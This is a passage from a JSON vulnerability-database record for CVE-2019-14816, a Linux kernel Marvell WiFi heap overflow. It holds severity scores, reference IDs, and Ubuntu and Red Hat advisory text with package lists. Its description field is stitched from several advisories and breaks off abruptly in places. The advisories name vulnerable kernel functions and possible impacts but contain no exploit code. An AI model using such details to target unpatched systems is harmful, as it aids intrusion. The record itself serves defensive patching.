            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-14816",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "secalert@redhat.com",
            "id": "CVE-2019-14816",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201908-2176",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. Linux Kernel Contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. =========================================================================\nUbuntu Security Notice USN-4162-2\nOctober 23, 2019\n\nlinux-azure vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux\nkernel for Microsoft Azure Cloud systems for Ubuntu 14.04 ESM. \n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. (CVE-2019-14814,\nCVE-2019-14815, CVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel did not properly validate device meta data. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-15117)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel improperly performed recursion while handling device meta\ndata. A physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15118)\n\nIt was discovered that the Technisat DVB-S/S2 USB device driver in the\nLinux kernel contained a buffer overread. A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexpose sensitive information. (CVE-2019-15505)\n\nBrad Spengler discovered that a Spectre mitigation was improperly\nimplemented in the ptrace susbsystem of the Linux kernel. A local attacker\ncould possibly use this to expose sensitive information. (CVE-2019-15902)\n\nIt was discovered that the SMB networking file system implementation in the\nLinux kernel contained a buffer overread. An attacker could use this to\nexpose sensitive information (kernel memory). (CVE-2019-15918)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  linux-image-4.15.0-1061-azure   4.15.0-1061.66~14.04.1\n  linux-image-azure               4.15.0.1061.47\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2020:0374-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2020:0374\nIssue date:        2020-02-04\nCVE Names:         CVE-2019-14816 CVE-2019-14895 CVE-2019-14898 \n                   CVE-2019-14901 CVE-2019-17133 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi\ndriver (CVE-2019-14816)\n\n* kernel: heap-based buffer overflow in mwifiex_process_country_ie()\nfunction in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c\n(CVE-2019-14895)\n\n* kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)\n\n* kernel: buffer overflow in cfg80211_mgd_wext_giwessid in\nnet/wireless/wext-sme.c (CVE-2019-17133)\n\n* kernel: incomplete fix  for race condition between\nmmget_not_zero()/get_task_mm() and core dumping in CVE-2019-11599\n(CVE-2019-14898)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* [Azure][7.8] Include patch \"PCI: hv: Avoid use of hv_pci_dev-\u003epci_slot\nafter freeing it\" (BZ#1766089)\n\n* [Hyper-V][RHEL7.8] When accelerated networking is enabled on RedHat,\nnetwork interface(eth0) moved to new network namespace does not obtain IP\naddress. (BZ#1766093)\n\n* [Azure][RHEL 7.6] hv_vmbus probe pass-through GPU card failed\n(BZ#1766097)\n\n* SMB3: Do not error out on large file transfers if server responds with\nSTATUS_INSUFFICIENT_RESOURCES (BZ#1767621)\n\n* Since RHEL commit 5330f5d09820 high load can cause dm-multipath path\nfailures (BZ#1770113)\n\n* Hard lockup in free_one_page()-\u003e_raw_spin_lock() because sosreport\ncommand is reading from /proc/pagetypeinfo (BZ#1770732)\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() (BZ#1772812)\n\n* fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITS=64\n(BZ#1775678)\n\n* Guest crash after load cpuidle-haltpoll driver (BZ#1776289)\n\n* RHEL 7.7 long I/O stalls with bnx2fc from not masking off scope bits of\nretry delay value (BZ#1776290)\n\n* Multiple \"mv\" processes hung on a gfs2 filesystem (BZ#1777297)\n\n* Moving Egress IP will result in conntrack sessions being DESTROYED\n(BZ#1779564)\n\n* core: backports from upstream (BZ#1780033)\n\n* kernel BUG at arch/powerpc/platforms/pseries/lpar.c:482! (BZ#1780148)\n\n* Race between tty_open() and flush_to_ldisc()  using the\ntty_struct-\u003edriver_data field. (BZ#1780163)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1062.12.1.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1062.12.1.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1062.12.1.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-devel-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-headers-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1062.12.1.el7.s390x.rpm\nperf-3.10.0-1062.12.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\npython-perf-3.10.0-1062.12.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1062.12.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.12.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.12.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14816\nhttps://access.redhat.com/security/cve/CVE-2019-14895\nhttps://access.redhat.com/security/cve/CVE-2019-14898\nhttps://access.redhat.com/security/cve/CVE-2019-14901\nhttps://access.redhat.com/security/cve/CVE-2019-17133\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXjnG/NzjgjWX9erEAQiZpA/+PrziwQc9nitsDyWqtq556llAnWG2YjEK\nkzbq/d3Vp+7i0aaOHXNG9b6XDgR8kPSLnb/2tCUBQKmLeWEptgY6s24mXXkiAHry\nplZ40Xlmca9cjPQCSET7IkQyHlYcUsc9orUT3g1PsZ0uOxPQZ1ivB1utn6nyhbSg\n9Az/e/9ai7R++mv4zJ7UDrDzuGPv5SOtyIcfuUyYdbuZO9OrmFsbWCRwG+cVvXJ6\nq6uXlIpcWx4H7key9SiboU/VSXXPQ0E5vv1A72biDgCXhm2kYWEJXSwlLH2jJJo7\nDfujB4+NSnDVp7Qu0aF/YsEiR9JQfGOOrfuNsmOSdK3Bx3p8LkS4Fd9y3H/fCwjI\nEOoXerSgeGjB5E/DtH24HKu1FB5ZniDJP69itCIONokq6BltVZsQRvZxpXQdmvpz\nhTJIkYqnuvrkv2liCc8Dr7P7EK0SBPhwhmcBMcAcPHE8BbOtEkcGzF2f2/p/CQci\nN0c4UhB2p+eSLq+W4qG4W/ZyyUh2oYdvPjPCrziT1qHOR4ilw9fH9b+jCxmAM7Lh\nwqj3yMR9YhUrEBRUUokA/wjggmI88u6I8uQatbf6Keqj1v1CykMKF3AEC5qfxwGz\nhk0YzSh0YK6DfybzNxcZK/skcp0Ga0vD+El/nXFI0WGXB8LsQiOUBgfp1JyAlXT6\nIwzrfQ6EsXE=\n=mofI\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Please note that the RDS protocol is blacklisted in Ubuntu by\ndefault. 7.3) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* RHEL7.5 - kernel crashed at xfs_reclaim_inodes_count+0x70/0xa0\n(BZ#1795578)\n\n4. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() [kernel-rt]\n(BZ#1772522)\n\n* kernel-rt: update to the RHEL7.7.z batch#4 source tree (BZ#1780322)\n\n* kvm nx_huge_pages_recovery_ratio=0 is needed to meet KVM-RT low latency\nrequirement (BZ#1781157)\n\n* kernel-rt:  hard lockup panic in during execution of CFS bandwidth period\ntimer (BZ#1788057)\n\n4. \n\nBug Fix(es):\n\n* [xfstests]: copy_file_range cause corruption on rhel-7 (BZ#1797965)\n\n* port show-kabi to python3 (BZ#1806926)\n\n4. 7.6) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\n* [PATCH] perf: Fix a race between ring_buffer_detach() and\nring_buffer_wakeup() (BZ#1772826)\n\n* core: backports from upstream (BZ#1780031)\n\n* Race between tty_open() and flush_to_ldisc()  using the\ntty_struct-\u003edriver_data field. (BZ#1780160)\n\n* [Hyper-V][RHEL7.6]Hyper-V guest waiting indefinitely for RCU callback\nwhen removing a mem cgroup (BZ#1783176)\n\nEnhancement(s):\n\n* Selective backport: perf: Sync with upstream v4.16 (BZ#1782752)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "156602"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "157140"
      },
      {
        "db": "PACKETSTORM",
        "id": "156608"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-14816",
        "trust": 3.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/08/28/1",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "155212",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "154951",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "154897",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156216",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "157140",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156608",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156020",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0415",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3817",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1172",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4252",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3570",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0790",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3064",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0766",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3897",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3835",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1248",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "154948",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156213",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156603",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156602",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009588"
      },
      {
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "db": "PACKETSTORM",
        "id": "156213"
      },
      {
        "db": "PACKETSTORM",
        "id": "156603"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "156602"
      },
      {
        "db": "PACKETSTORM",
        "id": "156216"
      },
      {
        "db": "PACKETSTORM",
        "id": "157140"
      },
      {
        "db": "PACKETSTORM",
        "id": "156608"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2176"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14816"
      }
    ]
  },
  "id": "VAR-201909-1526",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.25113124
  },
  "last_update_date": "2024-07-23T20:14:55.872000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
